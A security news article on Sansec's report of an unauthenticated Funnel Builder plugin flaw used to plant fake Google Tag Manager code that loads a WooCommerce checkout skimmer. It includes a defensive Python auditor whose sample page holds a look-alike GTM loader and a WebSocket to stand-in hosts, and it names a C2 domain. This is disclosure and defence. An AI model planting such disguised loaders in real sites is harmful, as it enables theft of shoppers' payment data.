
A critical security vulnerability affecting the Funnel Builder plugin for WordPress has been exploited to inject malicious JavaScript code into WooCommerce checkout pages with the purpose of stealing payment data.
Details of the activity were published by Sansec this week. The vulnerability, which currently has no formal CVE identifier, affects all versions of the plugin prior to 3.15.0.3. The plugin is used by over 40,000 WooCommerce stores.
The flaw allows an unauthenticated attacker to inject arbitrary JavaScript into any checkout page on a store, the Dutch e-commerce security company said. FunnelKit, which manages Funnel Builder, has released a patch for the vulnerability in version 3.15.0.3.
“The attacker embeds a fake Google Tag Manager script in the plugin’s ‘external scripts’ settings,” the report said. “The injected code looks like normal analytics next to the store’s actual tag, but it loads a payment skimmer that steals credit card numbers, CVVs, and billing addresses from the checkout.”
According to Sansec, Funnel Builder exposes a checkout endpoint that lets an incoming request choose which internal method the plugin executes. Older versions, however, neither checked the caller’s permissions nor restricted which methods could be called.
An attacker could abuse this by issuing an unauthenticated request that reaches an internal method (not named in the report) which writes attacker-controlled data directly to the plugin’s global configuration. The injected snippet is then rendered on every checkout page that Funnel Builder serves.
As a result, an attacker could plant malicious code on the store without any credentials.
Sansec said that in at least one case, it observed a payload masquerading as a Google Tag Manager (GTM) loader that launched JavaScript hosted on a remote domain. That script then opens a WebSocket connection to the attacker’s command-and-control (C2) server (“wss://protect-wss[.]com/ws”) to obtain a skimmer tailored to the victim’s storefront.
The ultimate goal of the attack is to siphon credit card numbers, CVVs, billing addresses, and other personal information that site visitors enter during checkout. Site owners should update the Funnel Builder plugin to the latest version and check Settings > Checkout > External Scripts for any unfamiliar entries, deleting any they find.
“Disguising skimmers as Google Analytics or Tag Manager code is a common pattern we see with Magecart, as reviewers tend to just skip over what looks like a familiar tracking tag,” Sansec said.
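The review problem Sansec describes (a look-alike tag sitting next to the genuine one) can be reduced to a mechanical check: collect every script on a rendered checkout page, compare each loaded host against a short allowlist, and flag GTM-shaped snippets that load from anywhere other than Google’s tag host, plus any WebSocket to an unknown host. The following Python script is an added example written for this article; it is not code from Sansec, FunnelKit, or the plugin. The allowlist, the sample HTML and the hosts `tags-cdn.example`, `collector.example` and `shop.example` are all constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist: hosts a store operator expects on their own checkout page.
ALLOWED_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com", "shop.example"}
# The only host a genuine Google Tag Manager container snippet should load from.
GTM_HOST = "www.googletagmanager.com"

# Absolute http(s)/ws(s) URLs inside inline script bodies.
URL_RE = re.compile(r"""(?:https?|wss?)://[^\s'"<>)]+""")


class _ScriptCollector(HTMLParser):
    """Collects every <script> element: its src attribute and its inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []          # list of {"src": str | None, "body": str}
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            self.scripts.append({"src": dict(attrs).get("src"), "body": ""})

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and self.scripts:
            self.scripts[-1]["body"] += data


def _host(url):
    return (urlparse(url).hostname or "").lower()


def audit_checkout_scripts(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (script_index, finding, host) tuples for scripts worth a human look."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for i, s in enumerate(parser.scripts):
        # 1. External <script src> pointing at a host not on the allowlist.
        if s["src"]:
            h = _host(s["src"])           # relative paths have no host and are skipped
            if h and h not in allowed_hosts:
                findings.append((i, "external-src-not-allowlisted", h))
        body = s["body"]
        lowered = body.lower()
        looks_like_gtm = "gtm.js" in lowered or "datalayer" in lowered or "tag manager" in lowered
        for url in URL_RE.findall(body):
            h = _host(url)
            if not h:
                continue
            # 2. Inline code opening a WebSocket to an unknown host (C2-style fetch of a skimmer).
            if url.startswith(("ws://", "wss://")) and h not in allowed_hosts:
                findings.append((i, "websocket-to-unknown-host", h))
            # 3. A GTM-shaped snippet that loads its container from the wrong host.
            elif looks_like_gtm and h != GTM_HOST:
                findings.append((i, "gtm-lookalike-loads-from", h))
            # 4. Any other reference to a host the operator does not recognise.
            elif h not in allowed_hosts:
                findings.append((i, "inline-reference-to-unknown-host", h))
    return findings


# Constructed checkout page: one genuine-shaped GTM snippet, one look-alike that swaps
# the host, two normal assets, and an inline WebSocket to an unknown host.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-XXXXXXX');</script>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];var f=d.getElementsByTagName(s)[0],
j=d.createElement(s);j.async=true;j.src='https://tags-cdn.example/gtm.js?id='+i;
f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-XXXXXXX');</script>
<script src="/wp-content/plugins/woocommerce/assets/js/frontend/checkout.min.js"></script>
<script src="https://shop.example/wp-includes/js/jquery/jquery.min.js"></script>
<script>var ws=new WebSocket('wss://collector.example/ws');</script>
</head><body>...</body></html>
"""

if __name__ == "__main__":
    for index, finding, host in audit_checkout_scripts(SAMPLE_CHECKOUT_HTML):
        print(f"script #{index}: {finding} -> {host}")
```

Run against the sample, the genuine snippet and the store’s own assets produce nothing, while the look-alike loader is reported as `gtm-lookalike-loads-from tags-cdn.example` and the inline socket as `websocket-to-unknown-host collector.example`. In practice the input would be the HTML of a real checkout page fetched as a visitor would see it, since the injected snippet lives in plugin configuration rather than in a file on disk; the domain Sansec reported can be added to a blocklist alongside the allowlist check.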
This disclosure comes weeks after Sucuri detailed a campaign in which Joomla websites were backdoored with heavily obfuscated PHP code that contacted attacker-controlled C2 servers, received and processed instructions sent by the operators, and served spam content to visitors and search engines without the site owners’ knowledge. The ultimate goal is to trade on the reputation of the compromised sites to push spam.
“The script acts as a remote loader,” said security researcher Puja Srivastava. “It connects to an external server, sends information about the infected website, and waits for instructions. The response from the remote server determines what content the infected site serves.”
“This approach allows an attacker to change the behavior of a compromised website at any time without having to modify local files again. The attacker can insert spam product links, redirect visitors, or dynamically display malicious pages.”
